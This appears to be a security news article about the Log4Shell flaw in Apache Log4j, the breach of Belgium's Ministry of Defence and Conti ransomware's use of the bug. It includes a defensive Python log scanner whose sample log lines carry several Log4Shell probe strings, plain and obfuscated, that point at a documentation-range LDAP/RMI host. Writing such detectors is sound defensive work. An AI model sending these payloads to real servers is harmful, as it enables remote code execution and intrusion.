The ripples of the Log4j vulnerability continue to reach sectors across the globe, and Belgium's Ministry of Defence is the latest confirmed victim. According to a report, the Belgian military acknowledged a cyberattack affecting some of its internet-facing systems. The threat actors behind the attack are unknown; the ministry said it quarantined the affected systems while restoring them and has notified the relevant authorities for further investigation.
Apache Log4j is a Java-based logging library developed by the Apache Software Foundation and embedded in a vast number of applications and products worldwide. The flaw, known as Log4Shell, lets an unauthenticated attacker execute arbitrary code on a vulnerable host: when a string the attacker controls (a User-Agent header, a username, a search term) is written to a log, Log4j's message lookup feature can be made to resolve a ${jndi:...} expression, contact an attacker-controlled LDAP or RMI server, and load and run the class it returns. Given that severity, the vulnerability was rated critical and assigned the maximum CVSS v3 base score of 10.0.
Hackers Exploited Log4j Flaw
The report found that unknown hackers exploited the Log4j vulnerability to penetrate and spy on the military's systems. The vulnerability, disclosed publicly in December 2021 and widely described as one of the most critical flaws seen in years, poses a significant risk to government and corporate networks across the globe. Because the bug yields remote code execution, an attacker who exploits it can take control of a vulnerable device, move laterally through the victim's network, and install malware or ransomware.
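To make the mechanism described above concrete, here is an added example (not code from the original article, from the Belgian ministry, or from Tenable) of what a Log4Shell probe looks like in a web server access log and how to spot it even when the attacker hides the ${jndi: trigger behind nested Log4j lookups. The log lines are constructed for this illustration, the IP addresses come from documentation ranges, and the small lookup resolver is a deliberately limited model of Log4j's lookup syntax (lower, upper and default-value lookups only, with lookup keys treated case-insensitively), not the real library.

```python
"""
Scan log lines for Log4Shell (CVE-2021-44228) probe strings.

Added example, not code from the original article. The log lines in
SAMPLE_LOG are constructed. Detection works by collapsing the nested
Log4j lookup syntax attackers use to disguise the `${jndi:` trigger.
"""
import re
from urllib.parse import unquote

# Innermost lookup: `${...}` whose body contains no further `${` or `}`.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Resolve one innermost lookup the way an attacker expects Log4j to.

    Only the lookups that matter for de-obfuscation are modelled; the
    jndi lookup itself is returned verbatim so the caller can spot it.
    Anything else is assumed to resolve to the empty string.
    """
    key, _, rest = body.partition(":")
    key = key.lower()
    if key == "jndi":
        return "${" + body + "}"          # keep the trigger intact
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:                      # default-value syntax: ${::-j}, ${env:NOPE:-j}
        return body.split(":-", 1)[1]
    return ""                             # unknown lookup (e.g. ${sys:...}): assume empty


def normalize(line: str, max_rounds: int = 20) -> str:
    """Undo URL encoding, then collapse nested lookups until nothing changes."""
    s = unquote(line)                     # access logs often carry %24%7Bjndi... verbatim
    for _ in range(max_rounds):           # bounded so a hostile line cannot stall the scanner
        new = _INNER.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def is_jndi_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, carries a jndi lookup."""
    return "${jndi:" in normalize(line).lower()


def scan(lines):
    """Return (index, normalized_line) for every line that carries a jndi lookup."""
    hits = []
    for i, line in enumerate(lines):
        n = normalize(line)
        if "${jndi:" in n.lower():
            hits.append((i, n))
    return hits


# Constructed access-log lines; 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:01:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a} HTTP/1.1" 400 0',
    '10.0.0.9 - - [10/Dec/2021:12:01:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:13 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fa%7D HTTP/1.1" 200 612',
    '10.0.0.3 - - [10/Dec/2021:12:02:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for idx, normalized in scan(SAMPLE_LOG):
        print(f"line {idx}: {normalized}")
```

Three of the four probes in the sample only become visible after normalization, which is why a plain grep for the literal string ${jndi: misses much real-world traffic. The resolver is intentionally narrow; pair log scanning like this with egress monitoring for unexpected outbound LDAP (389, 1389) and RMI (1099) connections from application servers, which catch a successful lookup regardless of how the trigger was spelled.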
Ripples of Log4j
Recently, Conti ransomware operators abused the Log4j flaw (CVE-2021-44228) to gain access to internal VMware vCenter Server instances, which shipped with a vulnerable copy of Log4j, and to encrypt the hosts they could reach from there. Rather than exploiting internet-facing services, the operators targeted vCenter from inside networks they had already compromised and used it for lateral movement, affecting victims in the U.S. and Europe. Conti thereby became the first major ransomware group to weaponize the Log4j vulnerability.
Commenting on the rising threats from the Log4j vulnerability, Glen Pendley, Deputy Chief Technology Officer at Tenable, said, “Log4Shell, a critical vulnerability in Apache Log4j, is in a league above every other vulnerability we’ve seen in the last few decades. It gives flaws like Heartbleed and Shellshock a run for their money because of just how pervasive and devastating it is. Everything across heavy industrial equipment, network servers, down to printers, and even your kid’s Raspberry Pi is potentially affected by this flaw. Some affected systems may be on-premises, others may be hosted in the cloud, but no matter where they are, the flaw is likely to have an impact.
Cybercriminals are already rubbing their hands with glee as early signs of ransomware activity have started to emerge. The worst part is, we aren’t even in the thick of it yet. Don’t be surprised when some major disruptions occur over the next few weeks and months, pointing at Log4j as the root cause.”